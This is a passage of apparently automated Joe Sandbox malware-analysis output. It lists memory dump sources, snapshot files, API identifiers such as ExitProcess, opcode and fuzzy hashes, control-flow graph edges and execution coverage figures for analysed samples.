                            • Associated: 00000000.00000002.1720414210.00000001009AE000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720414210.00000001009B2000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720414210.00000001009C7000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720531012.00000001009CA000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720551413.00000001009CB000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720577037.00000001009CD000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720577037.00000001010CC000.00000008.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_100000000_reduce.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: cbdc517d08d70e67295529891a336eec7399af31cb94bd593c70ca53ae34146f
                            • Instruction ID: 48b02fbab7062bd5209345767caade3ea1fe5ce447ca554bedf2b050c477dbd2
                            • Opcode Fuzzy Hash: cbdc517d08d70e67295529891a336eec7399af31cb94bd593c70ca53ae34146f
                            • Instruction Fuzzy Hash: 6BF01D75700A50CCF702AB6098153CD3768B309B88F484526AE8C17B0ACFB4C2D28780

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 00000000.00000002.1719435664.0000000100001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000100000000, based on PE: true
                            • Associated: 00000000.00000002.1719420329.0000000100000000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719793949.00000001005E6000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719808255.00000001005ED000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719873607.0000000100637000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719885626.0000000100639000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719936225.000000010063A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719947395.000000010063B000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719959534.000000010063E000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719971578.0000000100640000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719985238.000000010064F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719997011.0000000100652000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720009292.0000000100653000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720094571.0000000100654000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720107785.0000000100657000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720120775.000000010065C000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720133215.0000000100663000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720145160.0000000100664000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720157421.0000000100665000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720170049.0000000100666000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720414210.00000001009AE000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720414210.00000001009B2000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720414210.00000001009C7000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720531012.00000001009CA000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720551413.00000001009CB000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720577037.00000001009CD000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720577037.00000001010CC000.00000008.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_100000000_reduce.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2266927e57963bc7d73e39e48b32372e8f3b6fdaed5d289f772148ce9b545172
                            • Instruction ID: e7c1e186aca81daaf9e6d333712158edd3ca37f5a671d8e7065e9d07a9428669
                            • Opcode Fuzzy Hash: 2266927e57963bc7d73e39e48b32372e8f3b6fdaed5d289f772148ce9b545172
                            • Instruction Fuzzy Hash: D4E0B631610985E4EA17EB60EC097D82324B75C3C8FC45062A5CD421AADFA8CA8ACB51

                            Control-flow Graph

                            control_flow_graph 14 100003190 15 100003196-10000319b 14->15
                            Memory Dump Source
                            • Source File: 00000000.00000002.1719435664.0000000100001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000100000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_100000000_reduce.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 831f67f443be52cd1ba998e6a031efbf109914a3ba4ee8928bdaf1920663c5d6
                            • Instruction ID: 4b9a35214640487f3da69ba83e33ac60b8d98a16f100709ebed05dbeb4fcfe76
                            • Opcode Fuzzy Hash: 831f67f443be52cd1ba998e6a031efbf109914a3ba4ee8928bdaf1920663c5d6
                            • Instruction Fuzzy Hash:

                            Execution Graph

                            Execution Coverage:34.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:9
                            Total number of Limit Nodes:0
                            execution_graph 86 1000030a0 87 1000030ca 86->87 90 1000190a0 87->90 91 1000190ba 90->91 92 1000190f0 91->92 95 100018f80 92->95 94 1000030db 97 100018f92 95->97 96 100019084 ExitProcess 96->94 97->96

                            Callgraph

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 00000008.00000002.1992614543.0000000100001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 0000000100000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_100000000_Client32.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: cbdc517d08d70e67295529891a336eec7399af31cb94bd593c70ca53ae34146f
                            • Instruction ID: 48b02fbab7062bd5209345767caade3ea1fe5ce447ca554bedf2b050c477dbd2
                            • Opcode Fuzzy Hash: cbdc517d08d70e67295529891a336eec7399af31cb94bd593c70ca53ae34146f
                            • Instruction Fuzzy Hash: 6BF01D75700A50CCF702AB6098153CD3768B309B88F484526AE8C17B0ACFB4C2D28780

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 00000008.00000002.1992614543.0000000100001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 0000000100000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_100000000_Client32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2266927e57963bc7d73e39e48b32372e8f3b6fdaed5d289f772148ce9b545172
                            • Instruction ID: e7c1e186aca81daaf9e6d333712158edd3ca37f5a671d8e7065e9d07a9428669
                            • Opcode Fuzzy Hash: 2266927e57963bc7d73e39e48b32372e8f3b6fdaed5d289f772148ce9b545172
                            • Instruction Fuzzy Hash: D4E0B631610985E4EA17EB60EC097D82324B75C3C8FC45062A5CD421AADFA8CA8ACB51

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 14 100003190 15 100003196-10000319b 14->15
                            Memory Dump Source
                            • Source File: 00000008.00000002.1992614543.0000000100001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 0000000100000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_100000000_Client32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 831f67f443be52cd1ba998e6a031efbf109914a3ba4ee8928bdaf1920663c5d6
                            • Instruction ID: 4b9a35214640487f3da69ba83e33ac60b8d98a16f100709ebed05dbeb4fcfe76
                            • Opcode Fuzzy Hash: 831f67f443be52cd1ba998e6a031efbf109914a3ba4ee8928bdaf1920663c5d6
                            • Instruction Fuzzy Hash: